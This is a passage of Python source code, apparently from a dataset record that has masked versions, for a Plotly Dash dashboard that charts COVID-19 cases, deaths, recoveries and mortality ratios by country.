Deaths'].max() + 1.5), 'y': np\n .log10(int(di['Deaths'].max())), 'xref': 'x', 'yref': 'y',\n 'showarrow': False, 'text': list(di.loc[:, 'Country_Region'\n ])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align':\n 'center', 'font': {'size': 8, 'color': 'black'},\n 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1,\n 'bgcolor': '#ffffff', 'opacity': 0.6}\n fig100.append(trace)\n anno.append(a)\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.2310491 *\n i)) for i in list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 'Deaths Double Every 3 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Deaths Double Every 3 Days'], hovertemplate=\n '<b>Deaths Double Every 3 Days</b>', showlegend=True))\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.099021 *\n i)) for i in list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 'Deaths Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Deaths Double Every 7 Days'], hovertemplate=\n '<b>Deaths Double Every 7 Days</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Deaths',\n 'range': [np.log10(100), np.log10(cases_1000_start['Deaths'].\n max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': \n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, title='Overall Deaths',\n xaxis={'title': 'Days Since First 100 deaths', 'range': [0,\n deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange':\n True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig100, 'layout': layout_global}\n return fig_global\n elif select_global == 
'% Mortality by Confirmed Cases (Top 20 Countries)':\n figmort = []\n anno = []\n m = mort.sort_values(by=['Confirmed'], ascending=False).head(20)\n m = m.sort_values(by=['Mortality_Percent'], ascending=True\n ).reset_index()\n for i in range(len(m)):\n m1 = m.loc[i, 'Country_Region']\n m2 = m.loc[i, 'Mortality_Percent']\n trace = go.Bar(name='Observed Case - Mortality Ratio', x=[m2],\n y=[m1], text=[round(m.loc[i, 'Mortality_Percent'], 2)],\n orientation='h', textposition='auto', marker=dict(color=\n '#FFB000', opacity=0.6, line=dict(color=\n 'rgba(255,176,0, 1)', width=1)), hovertemplate=\n '<b>%{y}</b><br>' +\n '<br>Observed Case Mortaility Pct: %{text}&#37;<br>',\n showlegend=False)\n figmort.append(trace)\n layout_global = go.Layout(yaxis={'title': 'Country / Region',\n 'fixedrange': True, 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Observed Case - Mortality Ratio', xaxis={'title':\n '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [\n 0, m['Mortality_Percent'].max() + 2], 'fixedrange': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=750, hovermode='closest')\n fig_global = {'data': figmort, 'layout': layout_global}\n return fig_global\n elif select_global == 'Recoveries vs. 
Deaths By Country':\n figscat = []\n rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >= 100)\n ].reset_index()\n for i in range(len(rc)):\n scat = go.Scatter(x=[rc.loc[i, 'Deaths']], y=[rc.loc[i,\n 'Recovered']], mode='markers+text', text=[rc.loc[i,\n 'Country_Region']], marker_color=colors_dict_global[rc.loc[\n i, 'Continent']], showlegend=False, marker=dict(size=12,\n line_width=1, opacity=0.75), hovertemplate=\n '<b>%{text}</b><br>' + '<br>Recoveries: %{y}<br>' +\n 'Deaths: %{x}<br>', textposition='bottom center', textfont=\n dict(size=10, color='rgba(0, 0, 0, 0.6)'))\n figscat.append(scat)\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[i for i in list(np.linspace(100, rc['Deaths'].max(),\n 3))], mode='lines', name='Deaths = Recoveries', opacity=0.25,\n line=dict(color='grey', width=1), text=[\n '# of Deaths = # of Recoveries'], hovertemplate=\n '<b># of Deaths = # of Recoveries</b>', showlegend=True))\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i * 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Recoveries for Every Death',\n opacity=0.25, line=dict(color='green', width=3, dash='dash'),\n text=['2 Recoveries for Every Death'], hovertemplate=\n '<b>2 Recoveries for Every Death</b>', showlegend=True))\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i / 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Deaths for Every Recovery',\n opacity=0.25, line=dict(color='firebrick', width=3, dash='dash'\n ), text=['2 Deaths for Every Recovery'], hovertemplate=\n '<b>2 Deaths for Every Recovery</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Recoveries',\n 'fixedrange': True, 'automargin': True, 'range': [np.log10(100),\n np.log10(rc['Recovered'].max() * 1.1)], 'type': 'log',\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'dtick': 1, 
'showline': True, 'mirror': False}, title=\n 'Recoveries vs. Deaths, By Country', xaxis={'title':\n 'Number of Deaths', 'fixedrange': True, 'range': [np.log10(100),\n np.log10(rc['Deaths'].max() * 1.1)], 'type': 'log', 'linewidth':\n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, height=750, hovermode='closest'\n )\n fig_global = {'data': figscat, 'layout': layout_global}\n return fig_global\n\n\n@app.callback([Output(component_id='main-dropdown-2', component_property=\n 'options'), Output(component_id='btext1', component_property='children'\n ), Output(component_id='subplot1', component_property='figure'), Output\n (component_id='btext2', component_property='children'), Output(\n component_id='subplot2', component_property='figure'), Output(\n component_id='btext3', component_property='children'), Output(\n component_id='subplot3', component_property='figure')], [Input(\n component_id='main-dropdown', component_property='value')])\ndef update_country(selected_country):\n if selected_country is None:\n selected_country = 'Canada'\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} 
(Last 45 Days)'.format(\n selected_country), xaxis={'type': 'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n 
xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1\n }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n else:\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} (Last 45 Days)'.format(\n selected_country), xaxis={'type': 'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n 
final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': 
layout_t1\n }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n\n\n@app.callback(Output(component_id='box-1', component_property='figure'), [\n Input(component_id='main-dropdown', component_property='value'), Input(\n component_id='main-dropdown-2', component_property='value')])\ndef update_maingraph(selected_country, selected_graph):\n if selected_graph is None and selected_country is None:\n selected_country = 'Canada'\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph is None and selected_country is not None:\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': 
True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph == 'Total and Daily Confirmed Cases':\n figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], line=dict(color='#1A85FF', width=1.5), mode=\n 'lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'], line=dict(color='#D41159', width=3), mode=\n 'lines', fill='tozeroy')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19 ({0}): {1}'.format(str(\n selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n else:\n cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F',\n 'Recovered': '#009E73'}\n figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Date'], y=final_df.loc[final_df['Country_Region'] ==\n selected_country, selected_graph], marker_color=cols_dict[\n selected_graph])]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == 
selected_country,\n selected_graph].max() * 1.1], 'automargin': True, 'showline': \n True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'},\n title='Overall Progression of COVID-19 ({0}): {1}'.format(str(\n selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n\n\nif __name__ == '__main__':\n app.run_server()\n", "step-3": "<mask token>\nurls = [\n 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv'\n ,\n 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv'\n ,\n 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_recovered_global.csv'\n ]\nfinal_df = pd.read_csv('C:/Users/Jordan/Documents/COVID19/final_df.csv')\nfinal_df = calc_diff_country(final_df)\nfinal_df['Date'] = pd.to_datetime(final_df['Date'])\nfinal_df['Country_Region'] = final_df['Country_Region'].astype(str)\ncases_1000_start = final_df.loc[(final_df['Confirmed'] >= 1000) & (final_df\n ['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[\n 'Date']\ncases_1000_start = cases_1000_start.reset_index()\ncases_1000_start = cases_1000_start.rename(columns={'Date': 'Start_Date'})\nfinal_df['Country_Region'] = final_df['Country_Region'].str.strip()\ncases_1000_start = pd.merge(cases_1000_start, final_df, on=[\n 'Country_Region'], how='right')\ncases_1000_start['Start_Date'] = pd.to_datetime(cases_1000_start['Start_Date'])\ncases_1000_start['Date'] = pd.to_datetime(cases_1000_start['Date'])\ncases_1000_start = cases_1000_start[cases_1000_start['Start_Date'].notna()]\ncases_1000_start['Days Since 1000 Cases'] = 
(cases_1000_start['Date'] -\n cases_1000_start['Start_Date']).dt.days\ndeaths_100_start = final_df.loc[(final_df['Deaths'] >= 100) & (final_df[\n 'Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[\n 'Date']\ndeaths_100_start = deaths_100_start.reset_index()\ndeaths_100_start = deaths_100_start.rename(columns={'Date': 'Start_Date'})\nfinal_df['Country_Region'] = final_df['Country_Region'].str.strip()\ndeaths_100_start = pd.merge(deaths_100_start, final_df, on=[\n 'Country_Region'], how='right')\ndeaths_100_start['Start_Date'] = pd.to_datetime(deaths_100_start['Start_Date'])\ndeaths_100_start['Date'] = pd.to_datetime(deaths_100_start['Date'])\ndeaths_100_start = deaths_100_start[deaths_100_start['Start_Date'].notna()]\ndeaths_100_start['Days Since 100 Deaths'] = (deaths_100_start['Date'] -\n deaths_100_start['Start_Date']).dt.days\nmort = final_df.groupby(['Country_Region'])['Date'].max().reset_index()\nmort = pd.merge(mort, final_df, on=['Country_Region', 'Date'], how='left')\nmort['Mortality_Percent'] = mort['Deaths'] / mort['Confirmed'] * 100.0\ncolors_dict_global = {'Europe': '#1D6996', 'Asia': '#CC503E', 'Africa':\n '#94346E', 'North America': '#38A6A5', 'Middle East': '#EDAD08',\n 'South America': '#E17C05', 'Caribbean & Central America': '#0F8554',\n 'Oceania': '#73AF48'}\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\nserver = app.server\napp.layout = html.Div(children=[html.H2(children='COVID-19 Dashboard'),\n html.H4(children=\n 'A Basic Dashboard to Help Track the COVID-19 Pandemic'), html.Br(),\n html.H5(children='Global View'), html.P(children=\n 'The Global View highlights how Covid-19 is affecting countries across the world, and how the pandemic is expanding on a country by country basis. 
The Global View includes the following:'\n ), html.Div([html.Ul([html.Li([html.B(\n 'Cumulative Cases by Country Since First 1000 Cases: '),\n 'This allows us to see how cases are spreading since the first 1000 Cases on a country by country basis'\n ]), html.Li([html.B(\n 'Cumulative Cases by Country Since First 100 Deaths: '),\n 'This allows us to see COVID-19 fatalities since the first 100 Deaths on a country by country basis'\n ]), html.Li([html.B(\n 'Observed Case - Mortality Ratio (Top 20 Countries by Confirmed Cases): '\n ),\n 'This allows us to see the percentage of COVID19 fatalities based on reported cases and deaths. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)'\n ]), html.Li([html.B(\n 'Recoveries vs. Deaths By Country (Countries with over 100 deaths and 100 recoveries: '\n ),\n 'This plots Recoveries against Deaths on a country by country basis. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)'\n ])])], style={'font-size': 12}), html.Br(), dcc.Dropdown(id=\n 'global-dropdown', options=[{'label': y, 'value': y} for y in [\n 'Global Cases Trend', 'Global Deaths Trend',\n '% Mortality by Confirmed Cases (Top 20 Countries)',\n 'Recoveries vs. Deaths By Country']], placeholder=\n 'Pick Graphs From Here...'), dcc.Graph(id='global-box-1'), html.Br(),\n html.H5(children='Country View'), html.P(\n 'The Country view allows us to see a closer look on how the COVID-19 Pandemic has expanded. As opposed to a high level aggregation, the Country View provides a day by day time series analysis of the effects of COVID-19. 
The Country View includes the following:'\n ), html.Div(style={'font-size': 12}, children=[html.Ul([html.Li([html.B\n ('Confirmed: '),\n 'Cumulative Confirmed Cases of COVID-19 since January 22nd, 2020']),\n html.Li([html.B('Recovered: '),\n 'Cumulative Recovered Cases of COVID-19 since January 22nd, 2020']),\n html.Li([html.B('Deaths: '),\n 'Cumulative Deaths from COVID-19 since January 22nd, 2020']), html.Li([\n html.B('Total and Daily Confirmed Cases: '),\n 'Cumulative and Daily Cases Since January 22nd, 2020. This illustrates the curve of daily cases in relation to the total cases for a country'\n ])])]), dcc.Dropdown(id='main-dropdown', options=[{'label': x, 'value':\n x} for x in list(final_df.Country_Region.unique())], placeholder=\n 'Pick a Country From Here...'), dcc.Dropdown(id='main-dropdown-2',\n placeholder='Pick Graphs From Here...'), dcc.Graph(id='box-1'), html.\n Div([html.Div([html.H6(children='Most Recent New Cases'), html.H1(id=\n 'btext1'), dcc.Graph(id='subplot1')], className='four columns', style={\n 'color': '#648FFF'}), html.Div([html.H6(children=\n 'Most Recent Daily Deaths'), html.H1(id='btext2'), dcc.Graph(id=\n 'subplot2')], className='four columns', style={'color': '#DC267F'}),\n html.Div([html.H6(children='Most Recent Daily Recovered'), html.H1(id=\n 'btext3'), dcc.Graph(id='subplot3')], className='four columns', style={\n 'color': '#009E73', 'layout': 'right'})], className='row')])\n\n\n@app.callback(Output(component_id='global-box-1', component_property=\n 'figure'), [Input(component_id='global-dropdown', component_property=\n 'value')])\ndef global_update(select_global):\n if select_global == 'Global Cases Trend' or select_global is None:\n fig1000 = []\n anno = []\n for group, dataframe in cases_1000_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 1000 Cases'])\n trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di\n ['Confirmed'].tolist(), mode='lines', line=dict(color=\n 
colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Confirmed Cases: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 1000 Cases'].max() + 1.5), 'y': np\n .log10(int(di['Confirmed'].max())), 'xref': 'x', 'yref':\n 'y', 'showarrow': False, 'text': list(di.loc[:,\n 'Country_Region'])[0], 'xanchor': 'right', 'yanchor':\n 'middle', 'align': 'center', 'font': {'size': 8, 'color':\n 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1,\n 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6}\n fig1000.append(trace)\n anno.append(a)\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.2310491 *\n i)) for i in list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 3 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Cases Double Every 3 Days'], hovertemplate=\n '<b>Cases Double Every 3 Days</b>', showlegend=True))\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.099021 *\n i)) for i in list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Cases Double Every 7 Days'], hovertemplate=\n '<b>Cases Double Every 7 Days</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title':\n 'Number of Confirmed Cases', 'range': [np.log10(1000), np.log10\n (cases_1000_start['Confirmed'].max() * 1.1)], 'type': 'log',\n 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black',\n 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': \n False}, title='Overall Confirmed Cases', xaxis={'title':\n 'Days Since 
First 1000 Cases', 'range': [0, cases_1000_start[\n 'Days Since 1000 Cases'].max()], 'fixedrange': True,\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig1000, 'layout': layout_global}\n return fig_global\n elif select_global == 'Global Deaths Trend':\n fig100 = []\n anno = []\n for group, dataframe in deaths_100_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 100 Deaths'])\n trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di\n ['Deaths'].tolist(), mode='lines', line=dict(color=\n colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Deaths: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 100 Deaths'].max() + 1.5), 'y': np\n .log10(int(di['Deaths'].max())), 'xref': 'x', 'yref': 'y',\n 'showarrow': False, 'text': list(di.loc[:, 'Country_Region'\n ])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align':\n 'center', 'font': {'size': 8, 'color': 'black'},\n 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1,\n 'bgcolor': '#ffffff', 'opacity': 0.6}\n fig100.append(trace)\n anno.append(a)\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.2310491 *\n i)) for i in list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 'Deaths Double Every 3 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Deaths Double Every 3 Days'], hovertemplate=\n '<b>Deaths Double Every 3 Days</b>', showlegend=True))\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.099021 *\n i)) for i in 
list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 'Deaths Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Deaths Double Every 7 Days'], hovertemplate=\n '<b>Deaths Double Every 7 Days</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Deaths',\n 'range': [np.log10(100), np.log10(cases_1000_start['Deaths'].\n max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': \n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, title='Overall Deaths',\n xaxis={'title': 'Days Since First 100 deaths', 'range': [0,\n deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange':\n True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig100, 'layout': layout_global}\n return fig_global\n elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)':\n figmort = []\n anno = []\n m = mort.sort_values(by=['Confirmed'], ascending=False).head(20)\n m = m.sort_values(by=['Mortality_Percent'], ascending=True\n ).reset_index()\n for i in range(len(m)):\n m1 = m.loc[i, 'Country_Region']\n m2 = m.loc[i, 'Mortality_Percent']\n trace = go.Bar(name='Observed Case - Mortality Ratio', x=[m2],\n y=[m1], text=[round(m.loc[i, 'Mortality_Percent'], 2)],\n orientation='h', textposition='auto', marker=dict(color=\n '#FFB000', opacity=0.6, line=dict(color=\n 'rgba(255,176,0, 1)', width=1)), hovertemplate=\n 